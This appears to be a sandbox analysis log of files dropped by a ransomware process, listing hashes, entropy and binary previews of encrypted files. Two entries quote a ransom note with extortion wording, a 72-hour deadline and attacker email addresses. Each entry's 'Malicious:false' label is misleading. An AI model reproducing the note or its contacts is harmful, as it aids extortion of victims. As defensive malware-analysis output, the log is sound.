                                                                                                                                              Preview:.g^.._..P].....(..@]...zb......`|R:....VS2.v+.......'....5'rv....Sxu._...Q .$..U%.C..k.....w..x....-.......#.H.S.<T........a.:....2NT....J.........b..............5..1.].>..nr..)...R.a|.D.x.Y&.6?77...xp..I...D=;...T^gs.D........;...5....1.J.$.)......}.).P.....G.....|.........K.F....uk.........nu...g..n.....z$j7Ir........<.......Tz.x..d........*U........a...c...B.M=..1...W......_.{..]........~..y.....Q...... ....$.-sI..u...M.E.B.....S...^.QE.b.R.....x80$..KqW&.c...g.S...T...x..e..6%..U...?.....'...._.....v...n.:H6.[..|V......d{.#....2....0L>.p.;..L,S0..o.-a.A......h..47.ck..;CqvQ....c.r...%S.2........C.C..T,q..;.'-@64q.`..6Mfua.?.\..gC{r.>....Gu.L.n......pS;......_.n...V...V.>.....g.n.8.(....~.... c.V ........y<..(^....d..`3..SjL.;B.+e.E........LLr....\dd7l..S......A_M.....\.{n68..,....C.=}....f..'...\.'\..B...._@....S..3.)...0:..{..-...'..RS..O...`.g..{....N.6..6"im.A.JU9..3..M.p(...?..U._-.8j........o.:.. ..t...!.*...u=18I..h..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.849078916766468
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:uwljXwooBiTxWJc3psZ26ctjGp1Ljr3Pn8FZv3TAYhnHqpPKPtunBJlhmuXO6c/u:tqUxWYALvniZLAYCSIBThC/8R
                                                                                                                                              MD5:EEEE7A5375CE9BFD15506C42A275D253
                                                                                                                                              SHA1:7F82411CF239DF8B34B4E31458D68E74BA5716CB
                                                                                                                                              SHA-256:6712ED8AEE9D46B4ECA68E3EF30EFD979D1841594639A4BBA240015C67C1ACCD
                                                                                                                                              SHA-512:C29E83A80509FE788E589A7220263A7102A8A4D38B11AA05B1E812C7F3E6FC6EA62424312B9B35D5B53692FF06E86FC257853161E17C45F7BA32D239C4417D12
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.,..F,...{I5..d.N Ve-.R.}K...p:.xb..<s.....N.|..n..!..lp.......vB]..z%.B.@....QV.J.1{..~.]..9.ZP...f....@tO..`..]..5.\R....L.....]...p^..}..$c...*..3......+^-..C....BDK.W#.U....g...%.:..."./...<.v.l..".p..m.N%.:...x.~.........S.........2..v...0..L...r.,..t.nz8kU..g...:@.i|....00..........F..../!P.....mC7..s1g.?..dL..p..gW.rQ..........:P.*mj..r.."g..T.....LPbD./..fRC......{..#.o2.@t.N..e....e...J.e...5..C4.+%.S....4@q...d.c}.......x....W_.k....E.....}..K.o.{..E.4A.........0u.G.Q.6.P...}..o.9..#?!...k.9.I.....9[..H....F.(..P.; $py..J...N.2.&.q.5.....DU!.6VL...z..+l<F..3.....&O..jN....>(..i~...D+.z-.HL...n::SNo.7.Ym.|.....Vy....5@}tcV`d.......Sp......,..ABU.A.Pvd......o.p(....x.....#.L)X2-..Nx~l../...g7.WZ.$.\+...l.8>{_.-...P=..A.R.%.v,"X.`v.Y#.2.1.\s.i.F..C....L*........k.k.W.X...j.3m"...:.^....R....<*.y....Jn.H..5$.S....%!rf"....."...A.<..0.....1...*..d[.........s5bJ.....d.H....`...7?.x.lC[E.kp}\.-.My...)..4G...%.|...w..c......H3;f.3..iN...[w.(Q
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.849078916766468
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:uwljXwooBiTxWJc3psZ26ctjGp1Ljr3Pn8FZv3TAYhnHqpPKPtunBJlhmuXO6c/u:tqUxWYALvniZLAYCSIBThC/8R
                                                                                                                                              MD5:EEEE7A5375CE9BFD15506C42A275D253
                                                                                                                                              SHA1:7F82411CF239DF8B34B4E31458D68E74BA5716CB
                                                                                                                                              SHA-256:6712ED8AEE9D46B4ECA68E3EF30EFD979D1841594639A4BBA240015C67C1ACCD
                                                                                                                                              SHA-512:C29E83A80509FE788E589A7220263A7102A8A4D38B11AA05B1E812C7F3E6FC6EA62424312B9B35D5B53692FF06E86FC257853161E17C45F7BA32D239C4417D12
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.,..F,...{I5..d.N Ve-.R.}K...p:.xb..<s.....N.|..n..!..lp.......vB]..z%.B.@....QV.J.1{..~.]..9.ZP...f....@tO..`..]..5.\R....L.....]...p^..}..$c...*..3......+^-..C....BDK.W#.U....g...%.:..."./...<.v.l..".p..m.N%.:...x.~.........S.........2..v...0..L...r.,..t.nz8kU..g...:@.i|....00..........F..../!P.....mC7..s1g.?..dL..p..gW.rQ..........:P.*mj..r.."g..T.....LPbD./..fRC......{..#.o2.@t.N..e....e...J.e...5..C4.+%.S....4@q...d.c}.......x....W_.k....E.....}..K.o.{..E.4A.........0u.G.Q.6.P...}..o.9..#?!...k.9.I.....9[..H....F.(..P.; $py..J...N.2.&.q.5.....DU!.6VL...z..+l<F..3.....&O..jN....>(..i~...D+.z-.HL...n::SNo.7.Ym.|.....Vy....5@}tcV`d.......Sp......,..ABU.A.Pvd......o.p(....x.....#.L)X2-..Nx~l../...g7.WZ.$.\+...l.8>{_.-...P=..A.R.%.v,"X.`v.Y#.2.1.\s.i.F..C....L*........k.k.W.X...j.3m"...:.^....R....<*.y....Jn.H..5$.S....%!rf"....."...A.<..0.....1...*..d[.........s5bJ.....d.H....`...7?.x.lC[E.kp}\.-.My...)..4G...%.|...w..c......H3;f.3..iN...[w.(Q
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.85173500644551
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ovA4xAdCFQQkGusOHOWTmZw0k0V7D9M1PdJ7neduCF1QLAXvPlF5t5u5msS:ovSAkGj6OWYwGQJdJbeICF88lT7u5zS
                                                                                                                                              MD5:4B648987448DA562E5BE8A5900B9E954
                                                                                                                                              SHA1:633243D900B482CCC6A4CDED9185DD267E5707C6
                                                                                                                                              SHA-256:6A12A103CA4E7C00ECE50369A3B2C4FDE4DDFE74C441F28BEDEDC04886619094
                                                                                                                                              SHA-512:2CB1209840AFDA72F03E2D753361DDF7BB70FC0CFBFE3CF55D86C65B841C9737503433F6C32B6A259C402AAB4FA4476B587C21CCB9DD93A92C67E7CE24ABA384
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.e..2............N.<.Z[.=... ..1.........QU.V;.......y.3z...E<(.......hDjr.U.T.r_..p.'...P.O..SL#.....`O.<c...,BL1.7.#.W.Uj/@.;.}......$H.*....@....2r.W.......7..V...8.2[..uE.yk.p8.....>%.h...v...TY_..f..&.....l.;.|....o7.]...^..:..65.l].&..5?|.P...i..-.(.Y9 .....9.~..'...i.RLu..W....W.U..T1..$u....T.7.kG.3...(.Z...x.......m...4...>.;..!..V[.....t~...~T...~...K5..>...2F.0.......,AzX.z.N..J....'.<S.....>.d....n.^...|*D.....6..Llv...9i...>.....i..F..W8S0.......97rc...):..X.....,.L.._..[$.[.H4E.\.3SN(..w.!......h(..I..hm'hx..a..C...cXf+........K"+...%f......p.:y.].x.....k..P9...`....T.y.[.#....w..*.*..#...^c..G....Sq..Y..W^....8..?.e.p....arSk..Kc2......;...42.@.bT.._.8...z.M"XO.~P..$J.....#T3...^a......a..N,....R.p.+S...#.l..ca&.(k@...Se4.%r.$.g.<.&...EuJK..<.yE...@>f.8f0G#2...r...I.yf.....d.2.#...B....v..y.<(.d..VK.^.x>.H....-UV;...p%$I8.......!4l.....Jv.......?.?.....:.C)...i%;...P.3.0[="... ...:[}..L..U.DO....}...As.X.g.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.85173500644551
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ovA4xAdCFQQkGusOHOWTmZw0k0V7D9M1PdJ7neduCF1QLAXvPlF5t5u5msS:ovSAkGj6OWYwGQJdJbeICF88lT7u5zS
                                                                                                                                              MD5:4B648987448DA562E5BE8A5900B9E954
                                                                                                                                              SHA1:633243D900B482CCC6A4CDED9185DD267E5707C6
                                                                                                                                              SHA-256:6A12A103CA4E7C00ECE50369A3B2C4FDE4DDFE74C441F28BEDEDC04886619094
                                                                                                                                              SHA-512:2CB1209840AFDA72F03E2D753361DDF7BB70FC0CFBFE3CF55D86C65B841C9737503433F6C32B6A259C402AAB4FA4476B587C21CCB9DD93A92C67E7CE24ABA384
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.e..2............N.<.Z[.=... ..1.........QU.V;.......y.3z...E<(.......hDjr.U.T.r_..p.'...P.O..SL#.....`O.<c...,BL1.7.#.W.Uj/@.;.}......$H.*....@....2r.W.......7..V...8.2[..uE.yk.p8.....>%.h...v...TY_..f..&.....l.;.|....o7.]...^..:..65.l].&..5?|.P...i..-.(.Y9 .....9.~..'...i.RLu..W....W.U..T1..$u....T.7.kG.3...(.Z...x.......m...4...>.;..!..V[.....t~...~T...~...K5..>...2F.0.......,AzX.z.N..J....'.<S.....>.d....n.^...|*D.....6..Llv...9i...>.....i..F..W8S0.......97rc...):..X.....,.L.._..[$.[.H4E.\.3SN(..w.!......h(..I..hm'hx..a..C...cXf+........K"+...%f......p.:y.].x.....k..P9...`....T.y.[.#....w..*.*..#...^c..G....Sq..Y..W^....8..?.e.p....arSk..Kc2......;...42.@.bT.._.8...z.M"XO.~P..$J.....#T3...^a......a..N,....R.p.+S...#.l..ca&.(k@...Se4.%r.$.g.<.&...EuJK..<.yE...@>f.8f0G#2...r...I.yf.....d.2.#...B....v..y.<(.d..VK.^.x>.H....-UV;...p%$I8.......!4l.....Jv.......?.?.....:.C)...i%;...P.3.0[="... ...:[}..L..U.DO....}...As.X.g.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.831701294573274
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:U5/8wqzTzlEQcPcUr3W7FKQ340CYpTaRnDZq0BaJn0:U5/8plEU7FHt+x1lBax0
                                                                                                                                              MD5:95121E869C4CBB1958B3D7529971B82B
                                                                                                                                              SHA1:046AB529C6D69874F7DD81A01D4B15E6BD3CD685
                                                                                                                                              SHA-256:9B5F933B2F6ED5199FCCE7CFAAE8092F57B867B6BAD8FDA4BA3FA74C241EEC0A
                                                                                                                                              SHA-512:B0E3B83E11E3A5A4645D0333AC00A70E4A55F9FBC048E6CBB0229F4B396E206C675531CFFB81BD344D910F105DF5FFF787474FA82193471D7CAF685DFE86E591
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..TuQ.\.!..&...}.......M.F.c..8...L..n...9..'8...&&.0.aVX.D..L...Z.b.5VF"i...@[....k7........*..6.c.....B{[u.../C...1....2.QU..c..tU.&.'.Z.7u<...Ey$vu..=u.ZV.[..ELvb.F).m....7N..)g.M...~........Eh9.,..>.G}.../....[.?sHKwP.O.Tc.-.g...&...<."......e.e..0"....-.J..Ae_5#Z..,..!.r.....D.......!..J...~. X..4..Q..VVA..=.....Vz.W........6.G......-.....*..j.8.c0...MR......f..Kaa.....k........<f...|0.......%I.@.A<..................V{.FQ..h..{t..0..gu....7z..z$.g-t5A}g....Ip0w..|5..A...|4._.7GM.BG..+,.f..R,K.......*...`.......w..l.......t.Fa..@..f..2.x.(.......h.".Lj.<]d5...H"...9...+F....q.!...H.&r?.....CD.z.x..CN..0..[...]. .W]...;.C.N.u.....H................y.9d..Z....S.U.5v.......V.Pc..3T.0...C..'..U...o.........c.."..I..>.....k.3.W..k..L.z..9)..|;.0...8...M.E.-XAc.v.s....5S......Y.......v.........1.....2......k..+...[s.p.....-....s...\8j~'..h+U.s.h.SR!.K..b.8U.1^.............:...........se...5_*2..:6;..fv.Z.|...xh...*..(...z.)..n*i....#
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.831701294573274
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:U5/8wqzTzlEQcPcUr3W7FKQ340CYpTaRnDZq0BaJn0:U5/8plEU7FHt+x1lBax0
                                                                                                                                              MD5:95121E869C4CBB1958B3D7529971B82B
                                                                                                                                              SHA1:046AB529C6D69874F7DD81A01D4B15E6BD3CD685
                                                                                                                                              SHA-256:9B5F933B2F6ED5199FCCE7CFAAE8092F57B867B6BAD8FDA4BA3FA74C241EEC0A
                                                                                                                                              SHA-512:B0E3B83E11E3A5A4645D0333AC00A70E4A55F9FBC048E6CBB0229F4B396E206C675531CFFB81BD344D910F105DF5FFF787474FA82193471D7CAF685DFE86E591
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..TuQ.\.!..&...}.......M.F.c..8...L..n...9..'8...&&.0.aVX.D..L...Z.b.5VF"i...@[....k7........*..6.c.....B{[u.../C...1....2.QU..c..tU.&.'.Z.7u<...Ey$vu..=u.ZV.[..ELvb.F).m....7N..)g.M...~........Eh9.,..>.G}.../....[.?sHKwP.O.Tc.-.g...&...<."......e.e..0"....-.J..Ae_5#Z..,..!.r.....D.......!..J...~. X..4..Q..VVA..=.....Vz.W........6.G......-.....*..j.8.c0...MR......f..Kaa.....k........<f...|0.......%I.@.A<..................V{.FQ..h..{t..0..gu....7z..z$.g-t5A}g....Ip0w..|5..A...|4._.7GM.BG..+,.f..R,K.......*...`.......w..l.......t.Fa..@..f..2.x.(.......h.".Lj.<]d5...H"...9...+F....q.!...H.&r?.....CD.z.x..CN..0..[...]. .W]...;.C.N.u.....H................y.9d..Z....S.U.5v.......V.Pc..3T.0...C..'..U...o.........c.."..I..>.....k.3.W..k..L.z..9)..|;.0...8...M.E.-XAc.v.s....5S......Y.......v.........1.....2......k..+...[s.p.....-....s...\8j~'..h+U.s.h.SR!.K..b.8U.1^.............:...........se...5_*2..:6;..fv.Z.|...xh...*..(...z.)..n*i....#
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.84485457417288
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:j0tjgYAT5jtJRFpwBOCMLpSR0Y/5JbamnVqHnpU:j0iT5jzR7c8LN65JDVipU
                                                                                                                                              MD5:A48E80728F4B86B3F80EE31615E471EB
                                                                                                                                              SHA1:9AA64A292B6FC9A247BD2C6D8F86C5A1008BB089
                                                                                                                                              SHA-256:B77F290392F1363686B6B937C92140869C9E862AB19359F809E5212D7DCA353B
                                                                                                                                              SHA-512:841F86197ED94068863AFA217CB3F9553ADB0DA1C3EF8370CF82A99652D6D72C4C1BA3A2934D3EE607D4571AA22763E764C663491AFD98BA3B70A8D78A139FEC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:>Y.R..Kwvu..s0V?..Z...R...\..;..b..!X~.L..%6..L.=G+......>..Ev.u..U...O"...wi..o.(n...Z..R...y!*..8..9\..|......p..mh... w...D.Lz..r:y.NP..k.).0...~..#.|...D..k.......c...e...b.q......;........D.Rh.P.(.D%.i*D;....g..|Uu....W:y9..>.9.X....d..9.>....o.qy..[.p>k..^.85#.}..[..t*M.d.a.@.Y..{..n.b.......d....k.....SV..........hN.i.....Ly.7.C..l.'._JNp.<sh...l_..*.vxE.. -.....D(;.6*../.{S%a.+@..6%%_..o...L..~/$.J!8.......3..1....{..KY.TD.>.cp7........N4.Zt..J.............t..g..5.P...-~........D..e.......?..0...t..R.E.C...,g.X@...f...L..G...f.G..m../.......}.w..j"i.....,c.y}ll.{9w..sB......].{,.O 984.J..N..D....:...p..%%.C.v...&Tb.&.......k`...4A.....M...2.\...h.+7..C.....}..u T.8m..}t..d.P0..!..!k.~..l...]......C..-..AI...h..:=..B4..1=.../..S.;...8.g.~...l.v...ll...{........O(iE.........R.V.$gp..>/...i.R...j....0.:..\.. dhb..n.$.....`....7...E..}..1.~.1..3..).Bh.....s.....J<.6.u..Jv.].wPG.8...Q5..WS..g.+..:p.."C cuR.h.)C.....6..mh.[:N64...Y......
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.84485457417288
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:j0tjgYAT5jtJRFpwBOCMLpSR0Y/5JbamnVqHnpU:j0iT5jzR7c8LN65JDVipU
                                                                                                                                              MD5:A48E80728F4B86B3F80EE31615E471EB
                                                                                                                                              SHA1:9AA64A292B6FC9A247BD2C6D8F86C5A1008BB089
                                                                                                                                              SHA-256:B77F290392F1363686B6B937C92140869C9E862AB19359F809E5212D7DCA353B
                                                                                                                                              SHA-512:841F86197ED94068863AFA217CB3F9553ADB0DA1C3EF8370CF82A99652D6D72C4C1BA3A2934D3EE607D4571AA22763E764C663491AFD98BA3B70A8D78A139FEC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:>Y.R..Kwvu..s0V?..Z...R...\..;..b..!X~.L..%6..L.=G+......>..Ev.u..U...O"...wi..o.(n...Z..R...y!*..8..9\..|......p..mh... w...D.Lz..r:y.NP..k.).0...~..#.|...D..k.......c...e...b.q......;........D.Rh.P.(.D%.i*D;....g..|Uu....W:y9..>.9.X....d..9.>....o.qy..[.p>k..^.85#.}..[..t*M.d.a.@.Y..{..n.b.......d....k.....SV..........hN.i.....Ly.7.C..l.'._JNp.<sh...l_..*.vxE.. -.....D(;.6*../.{S%a.+@..6%%_..o...L..~/$.J!8.......3..1....{..KY.TD.>.cp7........N4.Zt..J.............t..g..5.P...-~........D..e.......?..0...t..R.E.C...,g.X@...f...L..G...f.G..m../.......}.w..j"i.....,c.y}ll.{9w..sB......].{,.O 984.J..N..D....:...p..%%.C.v...&Tb.&.......k`...4A.....M...2.\...h.+7..C.....}..u T.8m..}t..d.P0..!..!k.~..l...]......C..-..AI...h..:=..B4..1=.../..S.;...8.g.~...l.v...ll...{........O(iE.........R.V.$gp..>/...i.R...j....0.:..\.. dhb..n.$.....`....7...E..}..1.~.1..3..).Bh.....s.....J<.6.u..Jv.].wPG.8...Q5..WS..g.+..:p.."C cuR.h.)C.....6..mh.[:N64...Y......
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.873853763790362
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:5anPUWBcELxqLCBbx55IaXRvsvyIuWyv8y4gU0OjcUjQgk4DnAA0RPp6MTC9cCQM:EnPPBcEL2CBbx3BvyT7yUyngcSZk4DCK
                                                                                                                                              MD5:FDAEC3C642C8A6CC47E97E6A383AF765
                                                                                                                                              SHA1:E7A03AEA35379407E7FAABDFF921CC96E6C3DB81
                                                                                                                                              SHA-256:D9DF8FA0C9C01A777DCEDB487BE015C2FA37649A6A3F6FA8186EBACBA543E57E
                                                                                                                                              SHA-512:A9E4CD0328369BB43D61FD0039C65375C2446F2C7D228EF355DAADE9E5115EB991976ECE57F96A4D4AC0D5B1779C409A56F4BFF7863F2B54672F96AB0C91BA40
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.W....~...%...9..3.d.:.a3.......'.L.....J..E.\....#o.$.d..+.Q...2^..w.8IOk..p..V.....8.s..Z...e8.k...B....IQ.]..~.{8..:&#....0..}....Z.r/..TBw..:.G..-.....@..Y..y.~.L<....dS4.>..-+.....=.!.....d=.d`.I4...Ny.K.a..w.K0.+r...x...%.Rw..-..)..?.<.hp../A......6...y.F...5...`..k]^1.]..UH..K.O$....g.V.|y..(>..?:....|...N.m0..?......_.j...R..o..xj|.......7..vU..0V5m......qN.+.V..3@6u.,...;...8.-.=...U.O...&2%...'.p,-6@.-<.....nK..DY..I...e....?..........K.-...g"..c?...S...y.......C.....0.If.{F..T.L.q.N....X.#.c...G.[...oqaLM.j.\G.$;.e..[.,A=..]z?...I..qQ&-.H..|.bx.5..+Y.s...>......5.F.A.."....,.......v........f.........*.`t9Gh.2>+y..9\6.~.....V+....#Mx.2x.s....l~.p.+R....N....&y`.3_.X6...0?...X}..U..c.p..fg%1.../.]..X.....I}$..t.P..b.v'..?.h..V.E..^.a.|t.....l...PO...%x{G.......j.`.v.?`....&.G...!..5..x..Qy...R....B..A.t.&%9Q.]...I.9........'....@..?n.~cn.mr.....b..m(A..|....K.*....7g..ol^...=....D...P...Y...,..n.W.._....(...f...yro....zR.!z._)..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.873853763790362
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:5anPUWBcELxqLCBbx55IaXRvsvyIuWyv8y4gU0OjcUjQgk4DnAA0RPp6MTC9cCQM:EnPPBcEL2CBbx3BvyT7yUyngcSZk4DCK
                                                                                                                                              MD5:FDAEC3C642C8A6CC47E97E6A383AF765
                                                                                                                                              SHA1:E7A03AEA35379407E7FAABDFF921CC96E6C3DB81
                                                                                                                                              SHA-256:D9DF8FA0C9C01A777DCEDB487BE015C2FA37649A6A3F6FA8186EBACBA543E57E
                                                                                                                                              SHA-512:A9E4CD0328369BB43D61FD0039C65375C2446F2C7D228EF355DAADE9E5115EB991976ECE57F96A4D4AC0D5B1779C409A56F4BFF7863F2B54672F96AB0C91BA40
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.W....~...%...9..3.d.:.a3.......'.L.....J..E.\....#o.$.d..+.Q...2^..w.8IOk..p..V.....8.s..Z...e8.k...B....IQ.]..~.{8..:&#....0..}....Z.r/..TBw..:.G..-.....@..Y..y.~.L<....dS4.>..-+.....=.!.....d=.d`.I4...Ny.K.a..w.K0.+r...x...%.Rw..-..)..?.<.hp../A......6...y.F...5...`..k]^1.]..UH..K.O$....g.V.|y..(>..?:....|...N.m0..?......_.j...R..o..xj|.......7..vU..0V5m......qN.+.V..3@6u.,...;...8.-.=...U.O...&2%...'.p,-6@.-<.....nK..DY..I...e....?..........K.-...g"..c?...S...y.......C.....0.If.{F..T.L.q.N....X.#.c...G.[...oqaLM.j.\G.$;.e..[.,A=..]z?...I..qQ&-.H..|.bx.5..+Y.s...>......5.F.A.."....,.......v........f.........*.`t9Gh.2>+y..9\6.~.....V+....#Mx.2x.s....l~.p.+R....N....&y`.3_.X6...0?...X}..U..c.p..fg%1.../.]..X.....I}$..t.P..b.v'..?.h..V.E..^.a.|t.....l...PO...%x{G.......j.`.v.?`....&.G...!..5..x..Qy...R....B..A.t.&%9Q.]...I.9........'....@..?n.~cn.mr.....b..m(A..|....K.*....7g..ol^...=....D...P...Y...,..n.W.._....(...f...yro....zR.!z._)..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.831920891869241
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:VMG4PRkgVTTEc89TRBubKTN63XpYLKNCja1oAOy39NAObhfr6pKTZpma/5VhmiH:VMhpkgRr89TRZTN6HpYLKNysOy3wyhf3
                                                                                                                                              MD5:79CA2C51A7616B4504C6219A7D6DC5AF
                                                                                                                                              SHA1:90CD8453AAEADFFCB073A1F468E9B851887EDF74
                                                                                                                                              SHA-256:6A1D8F774141CD78F11F29053FCC306E690060D0591623C8AC5306C55E5E9EA3
                                                                                                                                              SHA-512:7F4D0572CC01F1E566E803DB6D5F4315DDB5CD6A7BAB8126E22AD21019416D34FF75BD1A5F57EB10B19C831747B5C92AB0F7A6FD89C1945F5F311021B1E49182
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....U........5..I..O..a..<....F...!.<.%.:`..#.2..Ei....6+.1!..}.I.'.....ys-.mw...*:....k...c...5 uuvlF.h..9.8.5${.<.aKg...l.p.:.7.....n......C{qO.S..m...'."....cCi....4..O.8O..."!{V2.5FZ..s3.w..2.r.........xc.1w`....A..R.T;.K&.xY.m1....S.Q..A.vB.C.......c$.J...........Z..?(....u.M......%.t.Z......b....Q....P..iJU[.....CV........J.._.>..1..u..L..oy.x/(t..'..i...BR..)..sF.a.......W.]...2....e.d..WA..........b$..1Q...P7{..$P..g...)-K....y.fj./.....].R.:...v..y#P.....O.RRA..Ay.@Yu..R9.E.8k.Hk.@].1......8...{.'.@I..b...H\.3.y....."!.5....t.>1[':...........Si....Q.......iTb6...#.s]..?lm......\...^{.\+.rR..-..Sk.....yX.-..L_.-].. .GW..4)]....I.....6....'j.....T......]<g...}.]11......D%.q;.4(......d..=2.\....~....o%...V....0...?D...pQ.L....K..w.`.r-y..]....^Q.a..q}v.9...t.=.d.E5.Y..H`..x...(...R4....7..%kX.U.!....PN..!.Z.e...%x...............l.y..#.+.%....g..~|..q..l.=.b{t..?...UD.v..O..Q..D%;_.v...U2.S...R<7Z....,......b.`.T...}...-@.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.831920891869241
